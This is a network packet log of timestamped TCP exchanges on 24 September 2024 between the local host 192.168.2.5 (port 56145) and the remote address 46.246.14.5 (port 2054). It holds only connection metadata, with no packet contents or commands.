Sep 24, 2024 23:43:28.130614996 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.135399103 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.135571957 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.140491962 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.141947031 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.146888018 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.146950960 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.151786089 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.151854992 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.156625986 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.156685114 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.161470890 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.162693024 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.167632103 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.167715073 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.172522068 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.189826012 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.194653034 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.194890976 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.199661016 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.199733973 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.204554081 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.204631090 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.209403038 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.209477901 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.214329004 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.215308905 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.220088959 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.220170975 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.225024939 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.225084066 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.229891062 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.232141972 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.236952066 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.237092972 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.241942883 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.242012978 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.246782064 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.246928930 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.251701117 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.251785040 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.256659031 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.260715961 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.265501976 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.265623093 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.270425081 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.270502090 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.275327921 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.281059027 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.301721096 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.302035093 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.307377100 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.320453882 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.325381041 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.325448036 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.330401897 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.330528975 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.336142063 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.336798906 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.344531059 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.344731092 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.350269079 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.350336075 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.355849028 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.356133938 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.362071037 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.362179041 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.367960930 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.368021965 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.373111010 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.393404007 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.398935080 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.399029016 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.404172897 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.404238939 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.409106016 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.410455942 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.415379047 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.415442944 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.420320034 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.420373917 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.425656080 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.426867008 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.431644917 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.431776047 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.436559916 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.436636925 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.441401958 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.443695068 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.448554039 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.448626995 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.453422070 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.453476906 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.458360910 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.458416939 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.463253021 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.463316917 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.468069077 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.468118906 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.472986937 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.473048925 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.477839947 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.477901936 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.482784033 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.482840061 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.487690926 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.487734079 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.492527962 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.493973970 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.498754025 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.498862982 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.503674984 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.503741980 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.509949923 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.510071039 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.514857054 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.517349958 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.522120953 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.522195101 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.526990891 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.528027058 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.532840014 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.533513069 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.538290024 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.594348907 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.604109049 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.604145050 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.608927965 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.710876942 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.715794086 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.717515945 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.722310066 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.759577990 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.764398098 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.764481068 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.769263983 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.783238888 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.788049936 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.788141966 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.792947054 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.799137115 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.803931952 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.803986073 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.809144974 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.809191942 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.813983917 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.814039946 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.818941116 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.819025993 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.823807001 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.827338934 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.832158089 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.832211971 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.837024927 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.837105036 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.841953993 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.846873999 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.851661921 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.851785898 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.856657982 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.857542038 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.862374067 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.862461090 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.867258072 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.867518902 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.872361898 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.872423887 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.877254009 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.877351046 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.882158995 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.882330894 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.887357950 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.887407064 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.892174959 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.892221928 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.897135019 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.897182941 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.901953936 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.903094053 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.907932043 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.907994986 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.912842989 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.912929058 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.918015003 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.922512054 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.927278042 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.927407980 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.932241917 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.932640076 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.937467098 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.937535048 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.942437887 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.942495108 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.947304010 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.947467089 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.952367067 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.952491999 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.957434893 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.960206032 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.965082884 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.965152979 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.969974041 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.974040031 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.978916883 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.979033947 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.983885050 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.983941078 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.988753080 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.990473032 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:28.995290041 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:28.995399952 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.000709057 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.019598961 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.024411917 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.024470091 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.029261112 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.030352116 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.035166025 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.035209894 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.040246964 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.040304899 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.045176029 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.045233011 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.050142050 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.050241947 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.054996967 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.056777954 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.061579943 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.061703920 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.066605091 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.066943884 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.071722984 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.071769953 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.077157974 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.077267885 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.082097054 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.084949017 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.089786053 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.089880943 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.094692945 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.094779968 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.099607944 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.099687099 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.104676962 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.104722023 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.109489918 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.111648083 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.116404057 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.116486073 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.121299982 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.121361017 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.126343966 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.126408100 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.131251097 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.131320000 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.136146069 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.138391018 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.143395901 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.143467903 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.148339033 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.148520947 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.153408051 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.153558016 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.159352064 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.159421921 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.164211035 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.164473057 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.171793938 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.171922922 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.176811934 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.178235054 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.183146954 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.183238983 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.187995911 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.188056946 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.192868948 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.192941904 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.197736979 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.197815895 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.202646971 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.206278086 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.211195946 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.211297989 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.216273069 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.216414928 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.221218109 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.222769022 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.227591038 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.227689981 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.234411001 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.234508038 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.239377975 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.239434004 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.244249105 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.244394064 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.249231100 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.253771067 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.261368036 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.261440039 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.268121958 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.271519899 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.276510954 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.276556015 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.281541109 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.296602011 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.301440001 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.301512003 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.306394100 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.336452961 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.341314077 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.365145922 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.369925976 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.374403000 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.379371881 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.379547119 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.385376930 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.385442972 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.390393019 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.411310911 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.416122913 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.416290045 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.421087980 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.421133995 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.426013947 CEST	2054	56145	46.246.14.5	192.168.2.5
Sep 24, 2024 23:43:29.426067114 CEST	56145	2054	192.168.2.5	46.246.14.5
Sep 24, 2024 23:43:29.431052923 CEST	2054	56145	46.246.14.5	192.168.2.5
